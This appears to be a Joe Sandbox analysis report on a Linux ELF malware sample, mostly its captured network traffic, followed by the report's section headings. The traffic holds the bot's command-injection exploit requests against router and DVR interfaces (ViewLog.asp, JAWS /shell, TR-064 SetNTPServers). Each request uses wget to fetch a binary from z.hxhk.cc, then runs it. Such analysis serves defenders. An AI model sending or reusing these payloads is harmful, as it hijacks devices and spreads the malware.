145	192.168.2.23	35276	82.96.64.224	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:05.948931932 CET	454	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you Content-Length: 176 Content-Type: application/x-www-form-urlencoded Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 73 79 73 36 34 2e 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 73 79 73 36 34 2e 61 72 6d 37 3b 2e 2f 73 79 73 36 34 2e 61 72 6d 37 2b 7a 79 2e 73 3b 72 6d 2b 2d 72 66 2b 73 79 73 36 34 2e 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://z.hxhk.cc/sys64.arm7;chmod+777+sys64.arm7;./sys64.arm7+zy.s;rm+-rf+sys64.arm7%3b%23&remoteSubmit=Save

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.23	42340	101.62.198.198	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:05.950388908 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:57:06.123955011 CET	430	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 208 Expires: Mon, 18 Mar 2024 08:57:06 GMT Date: Mon, 18 Mar 2024 08:57:06 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 36 63 36 33 65 36 35 26 23 34 36 3b 31 37 31 30 37 35 32 32 32 36 26 23 34 36 3b 31 32 66 33 33 65 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "[no URL]", is invalid.<p>Reference #9.c6c63e65.1710752226.12f33e0</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.23	32808	79.221.242.146	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:05.955823898 CET	231	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:57:06.134357929 CET	490	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 18 Mar 2024 08:57:05 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.23	43248	23.52.77.91	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:05.992995024 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:57:06.182104111 CET	430	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 208 Expires: Mon, 18 Mar 2024 08:57:06 GMT Date: Mon, 18 Mar 2024 08:57:06 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 37 33 34 31 30 36 30 26 23 34 36 3b 31 37 31 30 37 35 32 32 32 36 26 23 34 36 3b 31 66 64 62 33 32 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "[no URL]", is invalid.<p>Reference #9.a7341060.1710752226.1fdb326</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.23	60490	178.203.184.41	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:06.047137976 CET	454	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you Content-Length: 176 Content-Type: application/x-www-form-urlencoded Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 73 79 73 36 34 2e 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 73 79 73 36 34 2e 61 72 6d 37 3b 2e 2f 73 79 73 36 34 2e 61 72 6d 37 2b 7a 79 2e 73 3b 72 6d 2b 2d 72 66 2b 73 79 73 36 34 2e 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://z.hxhk.cc/sys64.arm7;chmod+777+sys64.arm7;./sys64.arm7+zy.s;rm+-rf+sys64.arm7%3b%23&remoteSubmit=Save
Mar 18, 2024 09:57:06.228523970 CET	336	IN	HTTP/1.1 405 Not Allowed Server: nginx Date: Mon, 18 Mar 2024 08:57:06 GMT Content-Type: text/html Content-Length: 150 Connection: keep-alive Keep-Alive: timeout=20 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
Mar 18, 2024 09:57:06.228542089 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Mon, 18 Mar 2024 08:57:06 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
150	192.168.2.23	47700	212.33.198.66	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:06.143241882 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:57:06.395143032 CET	903	IN	HTTP/1.1 400 Bad Request content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache content-length: 679 date: Mon, 18 Mar 2024 08:57:06 GMT server: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
151	192.168.2.23	36486	178.167.90.12	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:06.159884930 CET	454	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you Content-Length: 176 Content-Type: application/x-www-form-urlencoded Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 73 79 73 36 34 2e 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 73 79 73 36 34 2e 61 72 6d 37 3b 2e 2f 73 79 73 36 34 2e 61 72 6d 37 2b 7a 79 2e 73 3b 72 6d 2b 2d 72 66 2b 73 79 73 36 34 2e 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://z.hxhk.cc/sys64.arm7;chmod+777+sys64.arm7;./sys64.arm7+zy.s;rm+-rf+sys64.arm7%3b%23&remoteSubmit=Save

Session ID	Source IP	Source Port	Destination IP	Destination Port
152	192.168.2.23	43714	38.57.128.187	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:06.219518900 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:57:06.527772903 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Mon, 18 Mar 2024 08:57:06 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
153	192.168.2.23	58608	179.235.85.170	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:06.701934099 CET	735	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:
Mar 18, 2024 09:57:07.369539022 CET	735	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.<

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report 4lXTg8P7Ih.elf

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Snort Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/memfd:snapd-env-generator (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

DNS Queries

DNS Answers

HTTP Packets

Linux Analysis Report
4lXTg8P7Ih.elf